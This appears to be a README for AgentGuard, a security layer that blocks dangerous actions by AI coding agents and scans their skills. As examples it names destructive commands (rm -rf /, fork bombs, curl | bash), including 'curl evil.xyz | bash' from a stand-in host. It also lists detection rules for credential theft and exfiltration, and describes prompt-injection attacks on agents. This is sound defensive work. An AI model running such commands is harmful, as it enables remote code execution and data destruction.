The essential security guard for every AI agent user.
Your AI agent has full access to your terminal, files, and secrets — but zero security awareness.
A malicious skill or prompt injection can steal your keys, drain your wallet, or wipe your disk.
AgentGuard stops all of that.
AI coding agents can execute any command, read any file, and install any skill — with zero security review. The risks are real:
- Malicious skills can hide backdoors, steal credentials, or exfiltrate data
- Prompt injection can trick your agent into running destructive commands
- Unverified code from the internet may contain wallet drainers or keyloggers
AgentGuard is the first real-time security layer for AI agents. It automatically scans every new skill, blocks dangerous actions before they execute, and tracks which skill initiated each action. One install, always protected.
Layer 1 — Automatic Guard (hooks): Install once, always protected.
- Blocks
rm -rf /, fork bombs,curl | bashand destructive commands - Prevents writes to
.env,.ssh/, credentials files - Detects data exfiltration to Discord/Telegram/Slack webhooks
- Tracks which skill initiated each action — holds malicious skills accountable
Layer 2 — Deep Scan (skill): On-demand security audit with 24 detection rules.
- Auto-scans new skills on session start — malicious code blocked before it runs
- Static analysis for secrets, backdoors, obfuscation, and prompt injection
- Web3-specific: wallet draining, unlimited approvals, reentrancy, proxy exploits
- Trust registry with capability-based access control per skill
npm install @goplus/agentguardFull install with auto-guard hooks (Claude Code)
git clone https://github.com/GoPlusSecurity/agentguard.git
cd agentguard && ./setup.sh
claude plugin add /path/to/agentguardThis installs the skill, configures hooks, and sets your protection level.
Manual install (skill only)
git clone https://github.com/GoPlusSecurity/agentguard.git
cp -r agentguard/skills/agentguard ~/.claude/skills/agentguardThen use /agentguard in your agent:
/agentguard scan ./src # Scan code for security risks
/agentguard action "curl evil.xyz | bash" # Evaluate action safety
/agentguard trust list # View trusted skills
/agentguard report # View security event log
/agentguard config balanced # Set protection level
| Level | Behavior |
|---|---|
strict |
Block all risky actions. Every dangerous or suspicious command is denied. |
balanced |
Block dangerous, confirm risky. Good for daily use. (default) |
permissive |
Only block critical threats. For experienced users who want minimal friction. |
| Category | Rules | Severity |
|---|---|---|
| Execution | SHELL_EXEC, AUTO_UPDATE, REMOTE_LOADER | HIGH-CRITICAL |
| Secrets | READ_ENV_SECRETS, READ_SSH_KEYS, READ_KEYCHAIN, PRIVATE_KEY_PATTERN, MNEMONIC_PATTERN | MEDIUM-CRITICAL |
| Exfiltration | NET_EXFIL_UNRESTRICTED, WEBHOOK_EXFIL | HIGH-CRITICAL |
| Obfuscation | OBFUSCATION, PROMPT_INJECTION | HIGH-CRITICAL |
| Web3 | WALLET_DRAINING, UNLIMITED_APPROVAL, DANGEROUS_SELFDESTRUCT, HIDDEN_TRANSFER, PROXY_UPGRADE, FLASH_LOAN_RISK, REENTRANCY_PATTERN, SIGNATURE_REPLAY | MEDIUM-CRITICAL |
| Trojan & Social Engineering | TROJAN_DISTRIBUTION, SUSPICIOUS_PASTE_URL, SUSPICIOUS_IP, SOCIAL_ENGINEERING | MEDIUM-CRITICAL |
Scan the included vulnerable demo project:
/agentguard scan examples/vulnerable-skill
Expected output: CRITICAL risk level with detection hits across JavaScript, Solidity, and Markdown files.
GoPlus AgentGuard follows the Agent Skills open standard:
| Platform | Support |
|---|---|
| Claude Code | Full (skill + hooks auto-guard) |
| OpenAI Codex CLI | Skill (scan/action/trust commands) |
| Gemini CLI | Skill |
| Cursor | Skill |
| GitHub Copilot | Skill |
Hooks-based auto-guard (Layer 1) is specific to Claude Code's plugin system. The skill commands (Layer 2) work on any Agent Skills-compatible platform.
The auto-guard hooks (Layer 1) have the following constraints:
- Platform-specific: Hooks rely on Claude Code's
PreToolUse/PostToolUse/SessionStartevents. Other platforms do not yet support this hook system. - Default-deny policy: First-time use may trigger confirmation prompts for certain commands. A built-in safe-command allowlist (
ls,echo,pwd,git status, etc.) reduces false positives. - Skill source tracking is heuristic: AgentGuard infers which skill initiated an action by analyzing the conversation transcript. This is not 100% precise in all cases.
- Cannot intercept skill installation itself: Hooks can only intercept tool calls (Bash, Write, WebFetch, etc.) that a skill makes after loading — they cannot block the Skill tool invocation itself.
- Extend scanner rules to Markdown files (detect malicious SKILL.md)
- Base64 payload decoding and re-scanning
- New rules: TROJAN_DISTRIBUTION, SUSPICIOUS_PASTE_URL, SUSPICIOUS_IP, SOCIAL_ENGINEERING
- Safe-command allowlist to reduce hook false positives
- Plugin manifest (
.claude-plugin/) for one-step install
- OpenClaw gateway plugin integration
-
before_tool_call/after_tool_callhook wiring - OpenAI Codex CLI sandbox adapter
- Federated trust registry across platforms
- Threat intelligence feed (shared C2 IP/domain blocklist)
- Skill marketplace automated scanning pipeline
- VS Code extension for IDE-native security
- Community rule contributions (open rule format)
- MCP Server Setup — Run as a Model Context Protocol server
- SDK Usage — Use as a TypeScript/JavaScript library
- Trust Management — Manage skill trust levels and capability presets
- GoPlus API (Web3) — Enhanced Web3 security with GoPlus integration
- Architecture — Project structure and testing
Contributions welcome! See CONTRIBUTING.md for guidelines.
Found a security vulnerability? See SECURITY.md.
Built by GoPlus Security.